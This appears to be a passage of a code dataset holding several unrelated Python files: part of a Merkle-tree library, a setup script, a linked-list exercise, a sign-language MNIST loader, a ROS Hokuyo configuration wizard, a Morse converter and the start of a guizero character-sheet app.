:param sublength: length (number of leaves) for the afore-mentioned previous state of the Merkle-tree\n :type sublength: int\n :returns: ``True`` if the appropriate path of negatively signed hashes, generated implicitly for the provided\n ``sublength``, leads indeed to the provided ``oldhash``; otherwise ``False``\n :rtype: bool\n\n :raises InvalidTypesException: if the type of any of the provided arguments is not as prescribed\n :raises InvalidComparison: if the provided ``sublength`` is equal to ``0``\n \"\"\"\n\n if type(oldhash) is not bytes or type(sublength) is not int or sublength < 0:\n raise InvalidTypesException\n\n if sublength == 0:\n raise InvalidComparison\n\n if sublength <= len(self.leaves):\n\n # Generate corresponding path of negatively signed hashes\n\n left_roots = self.principal_subroots(sublength)\n left_path = tuple([(-1, _[1].digest) for _ in left_roots])\n\n # Perform hash-test\n\n return oldhash == self.multi_hash(signed_hashes=left_path, start=len(left_path) - 1)\n\n else: # sublength exceeds the tree's current length (includes the empty-tree case)\n\n return False\n\n
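# ~ Illustrative sketch (assumes a ``tree`` instance populated earlier in a\n # ~ session; record values are hypothetical):\n #\n # old_hash, old_length = tree.rootHash, tree.length # snapshot current state\n # tree.update(record='new entry') # the tree grows\n # assert tree.inclusionTest(old_hash, old_length) # old state still valid\n # proof = tree.consistencyProof(old_hash, old_length) # shareable proof object\n # # an unsatisfiable request yields a proof carrying proof_index == -1\n\n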
# --------------------------------- Encryption ---------------------------\n\n\n def encryptRecord(self, record):\n \"\"\"Updates the Merkle-tree by storing the hash of the inserted record in a newly-created leaf,\n restructuring the tree appropriately and recalculating all necessary interior hashes\n\n :param record: the record whose hash is to be stored into a new leaf\n :type record: str or bytes or bytearray\n :returns: ``0`` if the provided ``record`` was successfully encrypted, ``1`` otherwise\n :rtype: int\n\n .. note:: Return-value ``1`` means that ``UndecodableRecordError`` has been implicitly raised\n \"\"\"\n\n try:\n self.update(record=record)\n\n except UndecodableRecordError:\n return 1\n\n return 0\n\n\n def encryptFileContent(self, file_path):\n \"\"\"Encrypts the provided file as a single new leaf into the Merkle-tree\n\n More accurately, it updates the Merkle-tree with *one* newly-created leaf (cf. doc of the ``.update()`` method)\n storing the digest of the provided file's content\n\n :param file_path: relative path of the file under encryption with respect to the current working directory\n :type file_path: str\n :returns: ``0`` if the provided file was successfully encrypted, ``1`` otherwise\n :rtype: int\n\n .. note:: Return-value ``1`` means that ``UndecodableRecordError`` has been implicitly raised\n\n :raises FileNotFoundError: if the specified file does not exist\n \"\"\"\n try:\n with open(os.path.abspath(file_path), mode='r') as _file:\n with contextlib.closing(\n mmap.mmap(\n _file.fileno(),\n 0,\n access=mmap.ACCESS_READ\n )\n ) as _buffer:\n\n try:\n self.update(record=_buffer.read())\n\n except UndecodableRecordError:\n return 1\n else:\n return 0\n\n except FileNotFoundError:\n raise\n\n\n def encryptFilePerLog(self, file_path):\n \"\"\"Encrypts per log the data of the provided file into the Merkle-tree\n\n More accurately, it successively updates the Merkle-tree (cf. doc of the ``.update()`` method)\n with each line of the provided file in the respective order\n\n :param file_path: relative path of the file under encryption with respect to the current working directory\n :type file_path: str\n :returns: ``0`` if the provided file was successfully encrypted, ``1`` otherwise\n :rtype: int\n\n .. note:: Return-value ``1`` means that some line of the provided log-file is undecodable with the Merkle-tree's\n encoding type (i.e., a ``UnicodeDecodeError`` has been implicitly raised)\n\n :raises FileNotFoundError: if the specified file does not exist\n \"\"\"\n\n absolute_file_path = os.path.abspath(file_path)\n\n try:\n with open(absolute_file_path, mode='r') as _file:\n buffer = mmap.mmap(\n _file.fileno(),\n 0,\n access=mmap.ACCESS_READ\n )\n\n except FileNotFoundError:\n raise\n\n else:\n\n records = []\n\n while True:\n _record = buffer.readline()\n\n if not _record:\n break\n\n else:\n\n try:\n _record = _record.decode(self.encoding)\n except UnicodeDecodeError:\n return 1\n\n else:\n records.append(_record)\n\n tqdm.write('')\n\n # Perform line by line encryption\n\n for _record in tqdm(records, desc='Encrypting log file', total=len(records)):\n self.update(record=_record)\n\n tqdm.write('Encryption complete\\n')\n\n return 0\n\n\n def encryptObject(self, object, sort_keys=False, indent=0):\n \"\"\"Encrypts the provided object as a single new leaf into the Merkle-tree\n\n More accurately, it updates (cf. doc of the ``.update()`` method) the Merkle-tree with *one* newly-created leaf\n storing the digest of the provided object's stringified version\n\n :param object: the JSON entity under encryption\n :type object: dict\n :param sort_keys: [optional] Defaults to ``False``. If ``True``, then the object's keys get alphabetically sorted\n before its stringification.\n :type sort_keys: bool\n :param indent: [optional] Defaults to ``0``. 
Specifies key indentation upon stringification of the provided object.\n :type indent: int\n \"\"\"\n\n self.update(\n record=json.dumps(\n object,\n sort_keys=sort_keys,\n indent=indent\n )\n )\n\n\n def encryptObjectFromFile(self, file_path, sort_keys=False, indent=0):\n \"\"\"Encrypts the object within the provided ``.json`` file as a single new leaf into the Merkle-tree\n\n More accurately, the Merkle-tree is updated with *one* newly-created leaf (cf. doc of the ``.update()`` method)\n storing the digest of the stringified version of the object loaded from within the provided file\n\n :param file_path: relative path of a ``.json`` file with respect to the current working directory,\n containing *one* JSON entity\n :type file_path: str\n :param sort_keys: [optional] Defaults to ``False``. If ``True``, then the object's keys get alphabetically sorted\n before its stringification\n :type sort_keys: bool\n :param indent: [optional] Defaults to ``0``. Specifies key indentation upon stringification of the object\n under encryption\n :type indent: int\n\n :raises FileNotFoundError: if the specified file does not exist\n :raises JSONDecodeError: if the specified file could not be deserialized\n \"\"\"\n\n try:\n with open(os.path.abspath(file_path), 'rb') as _file:\n object = json.load(_file)\n\n except (FileNotFoundError, JSONDecodeError):\n raise\n\n else:\n self.update(\n record=json.dumps(\n object,\n sort_keys=sort_keys,\n indent=indent\n )\n )\n\n\n def encryptFilePerObject(self, file_path, sort_keys=False, indent=0):\n \"\"\"Encrypts per object the data of the provided ``.json`` file into the Merkle-tree\n\n More accurately, it successively updates the Merkle-tree (cf. doc of the ``.update()`` method) with each newly\n created leaf storing the digest of the respective JSON entity in the list loaded from the provided file\n\n :param file_path: relative path of a ``.json`` file with respect to the current working directory,\n containing a *list* of JSON entities\n :type file_path: str\n :param sort_keys: [optional] Defaults to ``False``. If ``True``, then the all objects' keys get alphabetically sorted\n before stringification\n :type sort_keys: bool\n :param indent: [optional] Defaults to ``0``. Specifies uniform key indentation upon stringification of objects\n :type indent: int\n\n :raises FileNotFoundError: if the specified file does not exist\n :raises JSONDecodeError: if the specified file could not be deserialized\n :raises WrongJSONFormat: if the JSON object loaded from within the provided file is not a list\n \"\"\"\n\n try:\n with open(os.path.abspath(file_path), 'rb') as _file:\n objects = json.load(_file)\n\n except (FileNotFoundError, JSONDecodeError):\n raise\n\n if type(objects) is not list:\n raise WrongJSONFormat\n\n for _object in objects:\n self.update(\n record=json.dumps(\n _object,\n sort_keys=sort_keys,\n indent=indent\n )\n )\n\n\n# ------------------------ Export to and load from file ------------------\n\n def export(self, file_path):\n \"\"\"Creates a ``.json`` file at the provided path and exports the minimum required information into it, so that the\n Merkle-tree can be reloaded in its current state from that file\n\n The final file will store a JSON entity with keys ``header`` (containing the parameters ``hash_type``, ``encoding``,\n and ``security``) and ``hashes``, mapping to the digests currently stored by the tree's leaves in respective order\n\n .. 
note:: If the provided path does not end with ``.json``, then this extension is appended to it before exporting\n .. warning:: If a file exists already for the provided path (after possibly extending with ``.json``, see above),\n then it gets overwritten\n\n :param file_path: relative path of the file to export to with respect to the current working directory\n :type file_path: str\n \"\"\"\n\n with open('%s.json' % file_path if not file_path.endswith('.json') else file_path, 'w') as _file:\n json.dump(\n self.serialize(),\n _file,\n indent=4\n )\n\n @staticmethod\n def loadFromFile(file_path):\n \"\"\"Loads a Merkle-tree from the provided file, the latter being the result of an export (cf. the ``.export()`` method)\n\n :param file_path: relative path of the file to load from with respect to the current working directory\n :type file_path: str\n :returns: the Merkle-tree loaded from the provided file\n :rtype: tree.MerkleTree\n\n :raises FileNotFoundError: if the specified file does not exist\n :raises JSONDecodeError: if the specified file could not be deserialized\n :raises WrongJSONFormat: if the JSON object loaded from within is not a Merkle-tree export (cf. the ``.export()`` method)\n \"\"\"\n try:\n with open(file_path, 'r') as _file:\n loaded_object = json.load(_file)\n except (FileNotFoundError, JSONDecodeError):\n raise\n\n try:\n _header = loaded_object['header']\n _tree = MerkleTree(\n hash_type=_header['hash_type'],\n encoding=_header['encoding'],\n security=_header['security']\n )\n except KeyError:\n raise WrongJSONFormat\n\n tqdm.write('\\nFile has been loaded')\n for hash in tqdm(loaded_object['hashes'], desc='Retrieving tree...'):\n _tree.update(digest=hash)\n\n tqdm.write('Tree has been retrieved')\n\n return _tree\n\n# --------------------------------- Comparison ---------------------------\n\n def __eq__(self, other):\n \"\"\"Implements the ``==`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n\n if not other:\n return not self\n else:\n return True if not self else self.rootHash == other.rootHash\n\n def __ne__(self, other):\n \"\"\"Implements the ``!=`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n\n if not other:\n return self.__bool__()\n else:\n return True if not self else self.rootHash != other.rootHash\n\n def __ge__(self, other):\n \"\"\"Implements the ``>=`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n\n if not other:\n return True\n else:\n return False if not self else self.inclusionTest(other.rootHash, other.length)\n\n def __le__(self, other):\n \"\"\"Implements the ``<=`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n else:\n 
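# ``<=`` delegates to the partner tree's ``>=`` with the operands swapped\n 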
return other.__ge__(self)\n\n def __gt__(self, other):\n \"\"\"Implements the ``>`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n\n if not other:\n return self.__bool__()\n elif not self or self.rootHash == other.rootHash:\n return False\n else:\n return self.inclusionTest(other.rootHash, other.length)\n\n def __lt__(self, other):\n \"\"\"Implements the ``<`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n else:\n return other.__gt__(self)\n\n# ------------------------------- Representation -------------------------\n\n def __repr__(self):\n \"\"\"Overrides the default implementation\n\n Sole purpose of this function is to easily print info about the Merkle-treee by just invoking it at console\n\n .. warning:: Contrary to convention, the output of this implementation is *not* insertible to the ``eval()`` function\n \"\"\"\n\n return '\\n uuid : {uuid}\\\n \\n\\\n \\n hash-type : {hash_type}\\\n \\n encoding : {encoding}\\\n \\n security : {security}\\\n \\n\\\n \\n root-hash : {root_hash}\\\n \\n\\\n \\n length : {length}\\\n \\n size : {size}\\\n \\n height : {height}\\n'.format(\n uuid=self.uuid,\n hash_type=self.hash_type.upper().replace('_', '-'),\n encoding=self.encoding.upper().replace('_', '-'),\n security='ACTIVATED' if self.security else 'DEACTIVATED',\n root_hash=self.rootHash.decode(self.encoding) if self else NONE,\n length=self.length,\n size=self.size,\n height=self.height\n )\n\n def __str__(self, indent=3):\n \"\"\"Overrides the default implementation.\n\n Designed so that inserting the Merkle-tree as an argument to ``print()`` displays it in a terminal friendly way.\n Resembles the output of the ``tree`` command at Unix based platforms.\n\n :param indent: [optional] Defaults to ``3``. The horizontal depth at which each level will be indented with\n respect to its previous one\n :type indent: int\n :rtype: str\n\n .. note:: The left parent of each node is printed *above* the right one\n \"\"\"\n try:\n _root = self.root\n except EmptyTreeException:\n return NONE_BAR\n\n return _root.__str__(indent=indent, encoding=self.encoding)\n\n# ------------------------------- Serialization --------------------------\n\n def serialize(self):\n \"\"\" Returns a JSON entity with the Merkle-trees's current characteristics and hashes currently stored by its leaves.\n\n :rtype: dict\n\n .. note:: This method does *not* serialize the tree structure itself, but only the info about the tree's fixed configs\n and current state, so that the tree be retrievable\n \"\"\"\n return MerkleTreeSerializer().default(self)\n\n def JSONstring(self):\n \"\"\"Returns a nicely stringified version of the Merkle-tree's JSON serialized form\n\n .. 
note:: The output of this method is to be passed into the ``print()`` function\n\n :rtype: str\n \"\"\"\n return json.dumps(\n self,\n cls=MerkleTreeSerializer,\n sort_keys=True,\n indent=4\n )\n\n# ---------------------------------- Clearance ---------------------------\n\n def clear(self):\n \"\"\"Deletes all nodes of the Merkle-tree, setting its ``root`` equal to ``None``\n \"\"\"\n self.leaves = []\n self.nodes = set()\n self._root = None\n","sub_path":"pymerkle/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":43808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"82094401","text":"from setuptools import setup, find_packages\n\n__version__ = '2021.1'\n\nsetup(name='microndla',\n version=__version__,\n py_modules=[\"microndla\"],\n description=\"Micron Deep Learning Acceleration SDK\",\n packages=find_packages(),\n install_requires=[\n \"numpy>=1.14.2\",\n \"Pillow>=5.0\",\n])\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"113499891","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def swapPairs(self, head):\n current = head\n prev = None\n out = None\n if head is None or head.next is None:\n return head\n while current is not None and current.next is not None:\n #assuming node.val cannot be changed\n swap = current.next\n current.next = swap.next\n swap.next = current\n if prev is not None:\n prev.next = swap\n else:\n out = swap\n prev = current\n current = current.next\n return out","sub_path":"LeetCode/Algorithms/swap_pair_nodes.py","file_name":"swap_pair_nodes.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566711095","text":"''' This file is to preprocess the images in order to use the CNN\r\n provided this this folder. This file should run first before\r\n any other file. \r\n\r\n The inspiration on this file came from the Tensor Flow Examples:\r\n https://github.com/tensorflow/tensorflow/blob/r1.6/tensorflow/contrib/learn/python/learn/datasets/mnist.py\r\n # Copyright 2016 The TensorFlow Authors. All Rights Reserved.\r\n #\r\n # Licensed under the Apache License, Version 2.0 (the \"License\");\r\n # you may not use this file except in compliance with the License.\r\n # You may obtain a copy of the License at\r\n #\r\n # http://www.apache.org/licenses/LICENSE-2.0\r\n #\r\n # Unless required by applicable law or agreed to in writing, software\r\n # distributed under the License is distributed on an \"AS IS\" BASIS,\r\n # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n # See the License for the specific language governing permissions and\r\n # limitations under the License.\r\n # ==============================================================================\r\n\r\n We did not use the code 100% but we got how the input images should be. 
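\r\n\r\n A sketch of the expected CSV layout (an assumption based on the Kaggle\r\n description: a header row, then one label followed by 784 pixel values per\r\n 28x28 grayscale image; the sample values below are invented):\r\n\r\n label,pixel1,pixel2,...,pixel784\r\n 3,107,118,127,...\r\n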
\r\n\r\n Note that the input images are from a data set that can be found: \r\n https://www.kaggle.com/datamunge/sign-language-mnist/data\r\n\r\n Include in the README folder how to preprocess data\r\n'''\r\n\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport numpy as np\r\nimport csv\r\nimport collections\r\n\r\nfrom tensorflow.python.framework import dtypes\r\nfrom tensorflow.python.framework import random_seed\r\n\r\n'''\r\n There are 24 classes in our data (The whole alphabet excluding j & z which uses motion)\r\n The data comes in a CVS. \r\n'''\r\n\r\n\r\ndef dense_to_one_hot(labels_dense, num_classes):\r\n \"\"\"Convert class labels from scalars to one-hot vectors.\"\"\"\r\n num_labels = labels_dense.shape[0]\r\n index_offset = np.arange(num_labels) * num_classes\r\n labels_one_hot = np.zeros((num_labels, num_classes))\r\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\r\n return labels_one_hot\r\n\r\ndef extract_data(filepath):\r\n ''' We will extract the Data from the csv file '''\r\n images = []\r\n labels = []\r\n firstline = True\r\n\r\n with open(filepath) as csvfile:\r\n reader = csv.reader(csvfile)\r\n for row in reader:\r\n if firstline: #skip first line\r\n firstline = False\r\n continue\r\n\r\n row_list = list(row)\r\n images.append(row_list[1:])\r\n\r\n # Relabel labels (since labels 9(J) & 25(Z) don't exist)\r\n if int(row[0]) > 9:\r\n labels.append(int(row[0])-1)\r\n else:\r\n labels.append(int(row[0]))\r\n\r\n images = np.array(images).astype(int)\r\n labels = np.array(labels).astype(int)\r\n \r\n return images, labels\r\n \r\n\r\n\r\n# def extract_labels(f, one_hot = False, num_classes = 5):\r\n\r\nclass DataSet(object):\r\n ''' Making the Dataset Class for training data and testing data'''\r\n def __init__(self,images,labels,dtype = dtypes.float32,reshape = False,seed = None ):\r\n # If seed is not set, use whatever graph level seed is returned\r\n seed1, seed2 = random_seed.get_seed(seed)\r\n np.random.seed(seed1 if seed is None else seed2)\r\n dtype = dtypes.as_dtype(dtype).base_dtype\r\n\r\n if dtype not in (dtypes.uint8, dtypes.float32):\r\n raise TypeError('Invalid image dtype %r, expected uint8 or float32' % dtype)\r\n\r\n assert images.shape[0] == labels.shape[0], ('images.shape: %s labels.shape: %s' % (images.shape, labels.shape))\r\n \r\n self._num_examples = images.shape[0]\r\n\r\n # Convert shape from [num explames, rows, columns, depth]\r\n # to [num examples, rows*columns] (assuming depth ==1)\r\n if reshape:\r\n # assert images.shape[3] == 1\r\n images = images.reshape(images.shape[0], images.shape[1] * images.shape[2])\r\n\r\n # Convert from [0, 255] -> [0.0, 1.0]\r\n if dtype == dtypes.float32:\r\n images = images.astype(np.float32)\r\n images = np.multiply(images, 1.0/255.0)\r\n\r\n self._images = images\r\n self._labels = labels\r\n self._epochs_completed = 0\r\n self._index_in_epoch = 0\r\n\r\n ''' Next few definitions are to get the variables from the class '''\r\n @property\r\n def images(self):\r\n return self._images\r\n\r\n @property\r\n def labels(self):\r\n return self._labels\r\n\r\n @property\r\n def num_examples(self):\r\n return self._num_examples\r\n\r\n @property\r\n def epochs_completed(self):\r\n return self._epochs_completed\r\n\r\n ''' Return the next batch_size exaamples from this data set. 
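\r\n\r\n A hypothetical call pattern (shapes follow the defaults of load_dataset\r\n below: flattened 28x28 images and 24 one-hot classes):\r\n\r\n data = load_dataset(one_hot=True)\r\n xs, ys = data.train.next_batch(128) # xs: (128, 784), ys: (128, 24)\r\n\r\n When a batch crosses an epoch boundary, the leftover examples of the\r\n finished epoch are concatenated with the head of the freshly shuffled\r\n next epoch.\r\n 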
'''\r\n def next_batch(self, batch_size, shuffle=True):\r\n \r\n start = self._index_in_epoch\r\n # Shuffle for the first epoch\r\n if self._epochs_completed == 0 and start == 0 and shuffle:\r\n perm0 = np.arange(self._num_examples)\r\n np.random.shuffle(perm0)\r\n self._images = self.images[perm0]\r\n self._labels = self.labels[perm0]\r\n # Go to the next epoch\r\n if start + batch_size > self._num_examples:\r\n # Finished epoch\r\n self._epochs_completed += 1\r\n # Get the rest examples in this epoch\r\n rest_num_examples = self._num_examples - start\r\n images_rest_part = self._images[start:self._num_examples]\r\n labels_rest_part = self._labels[start:self._num_examples]\r\n # Shuffle the data\r\n if shuffle:\r\n perm = np.arange(self._num_examples)\r\n np.random.shuffle(perm)\r\n self._images = self.images[perm]\r\n self._labels = self.labels[perm]\r\n # Start next epoch\r\n start = 0\r\n self._index_in_epoch = batch_size - rest_num_examples\r\n end = self._index_in_epoch\r\n images_new_part = self._images[start:end]\r\n labels_new_part = self._labels[start:end]\r\n return np.concatenate(\r\n (images_rest_part, images_new_part), axis=0), np.concatenate(\r\n (labels_rest_part, labels_new_part), axis=0)\r\n else:\r\n self._index_in_epoch += batch_size\r\n end = self._index_in_epoch\r\n return self._images[start:end], self._labels[start:end]\r\n\r\n\r\n\r\ndef load_dataset(one_hot=True,\r\n dtype=dtypes.float32,\r\n reshape=False, # We make it false , since the csv file already comes reshaped\r\n validation_size=0,\r\n seed=None):\r\n class DataSets(object):\r\n pass\r\n \r\n data_sets = DataSets()\r\n TRAIN = './Data/sign_mnist_train.csv'\r\n TEST = './Data/sign_mnist_test.csv'\r\n n_classes = 24\r\n\r\n # Get Training Images and labels\r\n train_images, train_labels = extract_data(TRAIN)\r\n\r\n # Get Testing Images and labels\r\n test_images, test_labels = extract_data(TEST)\r\n\r\n if(one_hot):\r\n train_labels = dense_to_one_hot(train_labels, n_classes)\r\n test_labels = dense_to_one_hot(test_labels, n_classes)\r\n\r\n if not 0 <= validation_size <= len(train_images):\r\n raise ValueError('Validation size should be between 0 and {}. 
Received: {}.'\r\n .format(len(train_images), validation_size))\r\n\r\n validation_images = train_images[:validation_size]\r\n validation_labels = train_labels[:validation_size]\r\n train_images = train_images[validation_size:]\r\n train_labels = train_labels[validation_size:]\r\n\r\n\r\n\r\n options = dict(dtype=dtype, reshape=reshape, seed=seed)\r\n\r\n data_sets.train = DataSet(train_images, train_labels, **options)\r\n data_sets.validation = DataSet(validation_images, validation_labels, **options)\r\n data_sets.test = DataSet(test_images, test_labels, **options)\r\n \r\n return data_sets\r\n\r\n","sub_path":"mnistDataset.py","file_name":"mnistDataset.py","file_ext":"py","file_size_in_byte":7561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"342956472","text":"\n__author__ = 'tom1231'\n\n\nfrom BAL.Interface.GUIWizard import GUIWizard\nfrom Tkinter import *\nfrom tkMessageBox import showerror\nfrom lxml.etree import SubElement\nimport webbrowser\n\n\nclass HokuyoWizard(GUIWizard):\n @staticmethod\n def displayData(data):\n info = 'Element Type: ' + data['elType'] + '\\n'\n info += 'Output: ' + data['output'] + '\\n'\n info += 'Port: ' + data['port'] + '\\n'\n info += 'Frame id: ' + data['frameId'] + '\\n'\n return info\n\n def editWizard(self, data):\n frame = Frame(self.master)\n name = Label(frame, text='Name:')\n output = Label(frame, text='Output:')\n port = Label(frame, text='Port:')\n frameId = Label(frame, text='Frame id:')\n\n self.name = Entry(frame)\n self.name.insert(END, data['name'])\n self.output = Entry(frame)\n self.output.insert(END, data['output'])\n self.port = Entry(frame)\n self.port.insert(END, data['port'])\n self.frameId = Entry(frame)\n self.frameId.insert(END, data['frameId'])\n\n add = Button(frame, text='Add', command=self.add)\n cancel = Button(frame, text='Cancel', command=self.cancel)\n\n name.grid(sticky=W)\n output.grid(sticky=W)\n port.grid(sticky=W)\n frameId.grid(sticky=W)\n add.grid(sticky=W)\n\n self.name.grid(row=0, column=1, sticky=E)\n self.output.grid(row=1, column=1, sticky=E)\n self.port.grid(row=2, column=1, sticky=E)\n self.frameId.grid(row=3, column=1, sticky=E)\n cancel.grid(row=4, column=1, sticky=E)\n\n hypLink = Label(frame, text='See hokuyo default arguments', fg='blue', cursor='hand2')\n hypLink.bind('', self.hrfCallBack)\n hypLink.grid()\n\n frame.pack()\n return self.finish\n\n def nameIsValid(self):\n for i in xrange(len(self.names)):\n if self.name.get() == self.names[i] and i != self.place:\n return False\n return True\n\n def createWizard(self, itemAvailable=None):\n frame = Frame(self.master)\n name = Label(frame, text='Name:')\n output = Label(frame, text='Output:')\n port = Label(frame, text='Port:')\n frameId = Label(frame, text='Frame id:')\n\n self.name = Entry(frame)\n self.name.insert(0, 'Hokuyo_Node')\n self.output = Entry(frame)\n self.output.insert(0, 'screen')\n self.port = Entry(frame)\n self.port.insert(0, '/dev/Hokuyo')\n self.frameId = Entry(frame)\n self.frameId.insert(0, 'Hokuyo_Frame')\n\n add = Button(frame, text='Add', command=self.add)\n cancel = Button(frame, text='Cancel', command=self.cancel)\n\n name.grid(sticky=W)\n output.grid(sticky=W)\n port.grid(sticky=W)\n frameId.grid(sticky=W)\n add.grid(sticky=W)\n\n self.name.grid(row=0, column=1, sticky=E)\n self.output.grid(row=1, column=1, sticky=E)\n self.port.grid(row=2, column=1, sticky=E)\n self.frameId.grid(row=3, column=1, sticky=E)\n cancel.grid(row=4, column=1, sticky=E)\n\n hypLink = 
Label(frame, text='See hokuyo default arguments', fg='blue', cursor='hand2')\n hypLink.bind('', self.hrfCallBack)\n hypLink.grid()\n\n frame.pack()\n return self.finish\n\n def hrfCallBack(self, event):\n webbrowser.open('http://wiki.ros.org/hokuyo_node')\n\n def getData(self):\n return self.text, self.element, self.data\n\n def __init__(self, parent, icon, names, place=-1):\n GUIWizard.__init__(self, icon)\n self.element = None\n self.text = None\n self.master = Toplevel()\n self.master.tk.call('wm', 'iconphoto', self.master._w, self.icon)\n self.finish = BooleanVar()\n self.parent = parent\n self.data = dict()\n self.master.protocol('WM_DELETE_WINDOW', self.close)\n self.names = names\n self.place = place\n\n def close(self):\n self.cancel()\n # showerror(title='Error', message='please use the cancel button to exit.')\n\n def add(self):\n if self.nameIsValid():\n self.data['elType'] = 'Hokuyo'\n self.data['name'] = self.name.get()\n self.data['output'] = self.output.get()\n self.data['port'] = self.port.get()\n self.data['frameId'] = self.frameId.get()\n self.element = SubElement(self.parent, 'node', {\n 'pkg': 'hokuyo_node',\n 'type': 'hokuyo_node',\n 'name': self.name.get(),\n 'output': self.output.get()\n })\n SubElement(self.element, 'param', {\n 'name': 'port',\n 'value': self.port.get()\n })\n SubElement(self.element, 'param', {\n 'name': 'frame_id',\n 'value': self.frameId.get()\n })\n self.text = self.name.get()\n self.finish.set(True)\n self.master.destroy()\n else:\n showerror(title='Error', message='Name is already taken.')\n\n def cancel(self):\n self.finish.set(False)\n self.master.destroy()","sub_path":"ric/ric_board/scripts/RiC_Gui/BAL/DevicesRows/HokuyoWizard.py","file_name":"HokuyoWizard.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"654541537","text":"from morse_dict import morse_dict\r\n\r\n\r\ndef morse_decoder(ugga):\r\n ausgabe = \"\"\r\n\r\n index = 0\r\n while index < len(ugga):\r\n\r\n pause = ugga.find('___', index)\r\n\r\n if pause > -1:\r\n if ugga[index:pause + 4] == \"____\":\r\n pause = pause + 4\r\n ausgabe += \" \"\r\n else:\r\n pause = pause + 3\r\n zeichen = ugga[index:pause]\r\n for key, value in morse_dict.items():\r\n if zeichen == value:\r\n ausgabe += key\r\n break\r\n\r\n index = pause\r\n else:\r\n index = len(ugga)\r\n\r\n return ausgabe\r\n\r\n\r\ndef morse_encoder(ugga):\r\n ausgabe = \"\"\r\n\r\n for char in ugga:\r\n if char in morse_dict.keys():\r\n ausgabe += morse_dict[char]\r\n\r\n return ausgabe\r\n","sub_path":"imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"646662911","text":"from guizero import App, Picture, Window, Box, Text, TextBox, PushButton, ListBox\nfrom time import sleep\nimport globals\nfrom windows.main_window import main_window\nfrom windows.splash_window import splash_window\nfrom windows.basic_info_window import basic_info_window\nfrom windows.basic_stats_window import basic_stats_window\nfrom windows.skill_window import skill_window\nfrom windows.inventory_window import inventory_window\nfrom windows.weapon_window import weapon_window\nfrom windows.spell_window import spell_window\nfrom windows.lpft_window import lpft_window\nfrom windows.settings_window import settings_window\nfrom windows.update_window import update_window\nimport sys\nimport os\n\n# Event handlers to open and refresh 
correct windows\ndef show_basic_info_window():\n if globals.character_selected:\n globals.basic_info_window.window.show()\ndef show_basic_stats_window():\n if globals.character_selected:\n globals.basic_stats_window.window.show()\ndef show_skill_window():\n if globals.character_selected:\n globals.skill_window.window.show()\ndef show_inventory_window():\n if globals.character_selected:\n globals.inventory_window.window.show()\ndef show_lpft_window():\n if globals.character_selected:\n globals.lpft_window.window.show()\ndef show_weapon_window():\n if globals.character_selected:\n globals.weapon_window.window.show()\ndef show_spell_window():\n if globals.character_selected:\n globals.spell_window.window.show()\ndef show_settings_window():\n globals.settings_window.window.show()\n\n# Loading global variables\nglobals.initialize()\n\n# Main application object\nglobals.main_window = main_window()\n\n# Splash window\nsplash_window = splash_window(globals.main_window.app)\n\nsplash_window.update_load()\n\n# Building main application widgets\nglobals.main_window.build()\n\nsplash_window.update_load()\n\n# Basic Info Window\nglobals.basic_info_window = basic_info_window(globals.main_window.app)\nglobals.main_window.msbuttons[0].when_clicked = show_basic_info_window\nglobals.basic_info_window.window.hide()\n\nsplash_window.update_load()\n\n# Basic Stats Window\nglobals.basic_stats_window = basic_stats_window(globals.main_window.app)\nglobals.main_window.msbuttons[1].when_clicked = show_basic_stats_window\nglobals.basic_stats_window.window.hide()\n\nsplash_window.update_load()\n\n# Attributes/Skills Window\nglobals.skill_window = skill_window(globals.main_window.app)\nglobals.main_window.msbuttons[2].when_clicked = show_skill_window\nglobals.skill_window.window.hide()\n\nsplash_window.update_load()\n\n# Inventory Window\nglobals.inventory_window = inventory_window(globals.main_window.app)\nglobals.main_window.msbuttons[3].when_clicked = show_inventory_window\nglobals.inventory_window.window.hide()\n\nsplash_window.update_load()\n\n# Texty Window (LPFT)\nglobals.lpft_window = lpft_window(globals.main_window.app)\nglobals.main_window.msbuttons[4].when_clicked = show_lpft_window\nglobals.lpft_window.window.hide()\n\nsplash_window.update_load()\n\n# Weapon Window\nglobals.weapon_window = 